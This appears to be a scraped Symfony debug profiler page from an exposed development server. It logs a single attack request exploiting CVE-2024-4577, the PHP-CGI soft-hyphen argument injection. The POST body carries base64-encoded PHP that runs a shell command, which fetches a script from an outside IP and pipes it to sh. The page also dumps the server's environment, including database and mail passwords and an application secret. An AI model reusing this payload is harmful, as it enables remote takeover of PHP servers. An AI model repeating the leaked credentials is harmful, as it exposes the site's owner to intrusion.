n/a
Request
GET Parameters
Key | Value |
---|---|
p | "hello.world" |
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzE1NC4yMTYuMjAuMTAyL3NoIHx8IHdnZXQgaHR0cDovLzE1NC4yMTYuMjAuMTAyL3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
No attributes
Request Headers
Header | Value |
---|---|
accept | "*/*" |
connection | "keep-alive" |
content-length | "225" |
content-type | "application/x-www-form-urlencoded" |
host | "172.104.159.37:80" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzE1NC4yMTYuMjAuMTAyL3NoIHx8IHdnZXQgaHR0cDovLzE1NC4yMTYuMjAuMTAyL3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Wed, 30 Oct 2024 15:18:18 GMT" |
x-debug-token | "72a86b" |
x-debug-token-link | "http://172.104.159.37/_profiler/57b7e3" |
x-previous-debug-token | "57b7e3" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "167aac464ff93a146ee252928c840d7b" |
AWS_KEY | "not-a-real-key" |
AWS_SECRET | "@@not-a-real-secret" |
DATABASE_URL | "mysql://grid_user:rxqCC2mLxPb4DEES@localhost:3306/grid_db?serverVersion=5.7" |
MAILER_URL | "smtp://mail.mpt-soft.com:2525?auth_mode=login&username=no-reply@mpt-soft.com&password=%3FgL%23oX%40%40e%21Bp" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "225" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/var/www/html/grid/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/html/grid/public" |
FCGI_ROLE | "RESPONDER" |
GATEWAY_INTERFACE | "CGI/1.1" |
HOME | "/var/www" |
HTTP_ACCEPT | "*/*" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "172.104.159.37:80" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_QUERY_STRING | "p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_SCRIPT_URI | "http://172.104.159.37/hello.world" |
REDIRECT_SCRIPT_URL | "/hello.world" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/hello.world" |
REMOTE_ADDR | "122.155.223.101" |
REMOTE_PORT | "49874" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1730301498 |
REQUEST_TIME_FLOAT | 1730301498.0842 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/var/www/html/grid/public/index.php" |
SCRIPT_NAME | "/index.php" |
SCRIPT_URI | "http://172.104.159.37/hello.world" |
SCRIPT_URL | "/hello.world" |
SERVER_ADDR | "172.104.159.37" |
SERVER_ADMIN | "[no address given]" |
SERVER_NAME | "172.104.159.37" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.29 (Ubuntu) Server at 172.104.159.37 Port 80</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.29 (Ubuntu)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,AWS_KEY,AWS_SECRET,DATABASE_URL,MAILER_URL" |
USER | "www-data" |
proxy-nokeepalive | "1" |